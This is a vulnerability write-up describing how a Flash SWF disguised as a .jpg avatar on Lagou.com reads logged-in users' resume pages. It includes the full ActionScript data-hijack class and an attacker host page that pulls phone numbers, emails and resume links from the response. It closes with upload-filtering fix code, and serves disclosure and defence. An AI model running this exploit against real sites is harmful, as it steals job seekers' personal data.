Lagou.com: a flaw lets other users' resumes be downloaded (sensitive data such as tokens can be obtained)
Today I saw a screenshot on the Internet!!! A 40k monthly salary!!!! All I can do is go to the site to get a feel for that 40k salary, and then I found something wrong ^_^
First, register a user at lagou.com.
Then upload an avatar:
The avatar shows up broken. What is it? A Flash cross-domain CSRF file renamed to .jpg! The rename only needs to defeat the upload form's extension check: Flash Player decides what a file is from its content, not from its extension or Content-Type, so the "image" is still a fully functional SWF once it is served from www.lagou.com.
Xiao Tao asked: why not just use the .swf suffix?
Instructor Du: I'd like to know that too, but have you ever seen an avatar upload that accepts .swf?
Look at the Flash code:
package com.powerflasher.SampleApp {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.external.ExternalInterface;
    import flash.net.URLLoader;
    import flash.net.URLRequest;

    /**
     * Loads the URL passed in the "input" FlashVar with the viewer's cookies
     * and hands every event, including the full response body, to the host
     * page's sendToJavaScript() callback.
     * @author User
     */
    public class CrossDomainDataHijack extends Sprite {
        private var loader:URLLoader;

        public function CrossDomainDataHijack() {
            loader = new URLLoader();
            configureListeners(loader);
            // Target URL is supplied by the embedding page, e.g. input=http://www.lagou.com/resume/preview.html
            var target:String = root.loaderInfo.parameters.input;
            var request:URLRequest = new URLRequest(target);
            try {
                loader.load(request);
            } catch (error:Error) {
                sendDatatoJS("Unable to load requested document; Error: " + error.getStackTrace());
            }
        }

        private function configureListeners(dispatcher:IEventDispatcher):void {
            dispatcher.addEventListener(Event.COMPLETE, completeHandler);
            dispatcher.addEventListener(Event.OPEN, openHandler);
            dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler);
            dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
            dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler);
            dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
        }

        // The response body (the victim's page source) is exfiltrated here.
        private function completeHandler(event:Event):void {
            var loader:URLLoader = URLLoader(event.target);
            sendDatatoJS("completeHandler: " + loader.data);
        }

        private function openHandler(event:Event):void {
            sendDatatoJS("openHandler: " + event);
        }

        private function progressHandler(event:ProgressEvent):void {
            sendDatatoJS("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
        }

        // Fires if the SWF is not in the target's Flash security sandbox (e.g. served from another domain without crossdomain.xml).
        private function securityErrorHandler(event:SecurityErrorEvent):void {
            sendDatatoJS("securityErrorHandler: " + event);
        }

        private function httpStatusHandler(event:HTTPStatusEvent):void {
            sendDatatoJS("httpStatusHandler: " + event);
        }

        private function ioErrorHandler(event:IOErrorEvent):void {
            sendDatatoJS("ioErrorHandler: " + event);
        }

        // Calls the JavaScript function sendToJavaScript(data) defined on the embedding page.
        private function sendDatatoJS(data:String):void {
            trace(data);
            ExternalInterface.call("sendToJavaScript", data);
        }
    }
}
Now let's see whether this image can be viewed by all users. If only the uploader can see it, we can only attack ourselves...
View the image address:
Check whether other users can access it:
Other users can access it, so this is not limited to our own account. Now let's test whether we can read the content of an arbitrary lagou.com page!
First, pick a page that requires the user to be logged in, such as the resume settings page:
On this page, check whether we can get its source code:
Both the Flash address and the page to GET return data, including the mobile phone number and email address!
Tidying up the output:
We can see that it is indeed our resume page. The source code also contains the resume download link:
This link can be accessed by anyone ....
Test link: http://jsbin.com/ladujohifika/2
Open it while logged in to lagou.com and the contents of http://www.lagou.com/resume/preview.html are printed. The request is sent by the SWF, which is served from www.lagou.com, so Flash Player runs it in lagou.com's security sandbox and the browser attaches the visitor's lagou.com cookies; that is why a page behind login comes back to the attacker's page.
Test Page code:
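The report's own test page is not reproduced above. What follows is an added example written for this page, not the author's code: it builds the attacker-side host page that embeds the uploaded "avatar" SWF with the target URL in FlashVars, and shows what the sendToJavaScript() callback does with the page source the SWF hands back. The avatar URL, the helper names and the sample response are assumptions; only http://www.lagou.com/resume/preview.html and the callback name come from the report.

```javascript
// Added example, not the original report's test page.
const SWF_URL = "http://www.lagou.com/upload/avatar/example.jpg"; // hypothetical path; the real one is not in the report
const TARGET_URL = "http://www.lagou.com/resume/preview.html";

// FlashVars are form-encoded; the SWF reads them as root.loaderInfo.parameters.input.
function buildFlashVars(params) {
  return Object.keys(params)
    .map((k) => encodeURIComponent(k) + "=" + encodeURIComponent(params[k]))
    .join("&");
}

// allowScriptAccess=always matters: the SWF lives on lagou.com while this page is on
// the attacker's domain, and ExternalInterface.call() to a page on another domain is
// refused under the default "sameDomain" setting.
function buildHostPage(swfUrl, targetUrl) {
  const flashvars = buildFlashVars({ input: targetUrl });
  return [
    "<!DOCTYPE html><html><body>",
    "<script>",
    "  // Called by the SWF via ExternalInterface.call('sendToJavaScript', data)",
    "  function sendToJavaScript(data) {",
    "    document.getElementById('out').textContent += data + '\\n';",
    "  }",
    "</script>",
    '<object type="application/x-shockwave-flash" data="' + swfUrl + '" width="1" height="1">',
    '  <param name="movie" value="' + swfUrl + '">',
    '  <param name="flashvars" value="' + flashvars + '">',
    '  <param name="allowscriptaccess" value="always">',
    "</object>",
    '<pre id="out"></pre>',
    "</body></html>",
  ].join("\n");
}

// Server-side/Node version of what the callback does with each message: the SWF
// prefixes every message with the handler name, so split on the first ": ".
function handleCallback(data) {
  const sep = data.indexOf(": ");
  const kind = sep === -1 ? data : data.slice(0, sep);
  const payload = sep === -1 ? "" : data.slice(sep + 2);
  if (kind === "completeHandler") {
    return { kind: "complete", findings: extractSensitive(payload) };
  }
  if (kind === "securityErrorHandler") {
    // The SWF was not in the target's Flash sandbox (different domain, no
    // crossdomain.xml); the hijack does not work in that case.
    return { kind: "security-error", findings: null };
  }
  return { kind: "other", findings: null };
}

// Pull out what the report says the resume page exposes: the download link,
// the e-mail address and the mobile number (mainland China format).
function extractSensitive(html) {
  const links = [];
  const linkRe = /href=["']([^"']*\/resume\/[^"']*)["']/gi;
  let m;
  while ((m = linkRe.exec(html)) !== null) links.push(m[1]);
  const emails = html.match(/[\w.+-]+@[\w-]+(?:\.[\w-]+)+/g) || [];
  const phones = html.match(/\b1[3-9]\d{9}\b/g) || [];
  return { links, emails, phones };
}

// Constructed sample of a completeHandler message; not real lagou.com markup.
const SAMPLE_RESPONSE =
  "completeHandler: <html><body>" +
  '<span class="phone">13800138000</span> <span>someone@example.com</span>' +
  '<a href="http://www.lagou.com/resume/download/sample">Download resume</a>' +
  "</body></html>";
```

Anyone logged in to lagou.com who opens the generated page has their own resume page fetched and handed to the attacker's script; the securityErrorHandler branch is the check that tells you whether the uploaded file really landed on the same domain as the target.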
Solution:
Filter uploads by their actual content, not by file name: reject anything whose first bytes are a Flash signature (FWS, CWS, ZWS), accept only files whose bytes begin with a real image signature that matches the extension, and re-encode the image on the server. Serving user uploads from a separate domain rather than www.lagou.com also prevents a file that slips through from running in lagou.com's Flash security sandbox.
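An added example of the content filter described above, written for this page and not lagou.com's own code: the upload handler sniffs the first bytes of the file instead of trusting the .jpg name, so a renamed SWF is rejected. The helper names and the two sample buffers are constructed for the example.

```javascript
// Added example of the "filter" fix; not lagou.com's implementation.
const IMAGE_SIGNATURES = [
  { type: "image/jpeg", exts: ["jpg", "jpeg"], magic: [0xff, 0xd8, 0xff] },
  { type: "image/png", exts: ["png"], magic: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: "image/gif", exts: ["gif"], magic: [0x47, 0x49, 0x46, 0x38] }, // "GIF8"
];

// Flash Player recognises a movie by its first three bytes, whatever the file is
// called: "FWS" = uncompressed, "CWS" = zlib-compressed, "ZWS" = LZMA-compressed.
const SWF_SIGNATURES = ["FWS", "CWS", "ZWS"];

function startsWithBytes(buf, bytes) {
  if (buf.length < bytes.length) return false;
  for (let i = 0; i < bytes.length; i++) {
    if (buf[i] !== bytes[i]) return false;
  }
  return true;
}

function isSwf(buf) {
  return buf.length >= 3 && SWF_SIGNATURES.includes(buf.toString("latin1", 0, 3));
}

function sniffImage(buf) {
  return IMAGE_SIGNATURES.find((s) => startsWithBytes(buf, s.magic)) || null;
}

// Returns { ok: true, type } for an acceptable avatar, otherwise { ok: false, reason }.
// An extension-only check (what the renamed .jpg defeated) is kept only as a
// consistency check after the content has been identified.
function validateAvatar(buf, fileName) {
  if (isSwf(buf)) return { ok: false, reason: "Flash movie disguised as image" };
  const sig = sniffImage(buf);
  if (!sig) return { ok: false, reason: "not a recognised image format" };
  const ext = fileName.toLowerCase().split(".").pop();
  if (!sig.exts.includes(ext)) return { ok: false, reason: "extension does not match content" };
  return { ok: true, type: sig.type };
}

// Constructed inputs: the start of a JFIF JPEG, and the start of an uncompressed
// SWF (signature, version byte, 4-byte length) uploaded under a .jpg name.
const SAMPLE_JPEG = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00]);
const SAMPLE_SWF_AS_JPG = Buffer.concat([
  Buffer.from("FWS", "latin1"),
  Buffer.from([0x0a, 0x00, 0x00, 0x00, 0x00]),
]);
```

Run validateAvatar() before the file is written anywhere web-reachable; in production, follow it with a re-encode through an image library so that whatever is stored is bytes the server produced, and host the result on a domain other than the one that serves logged-in pages.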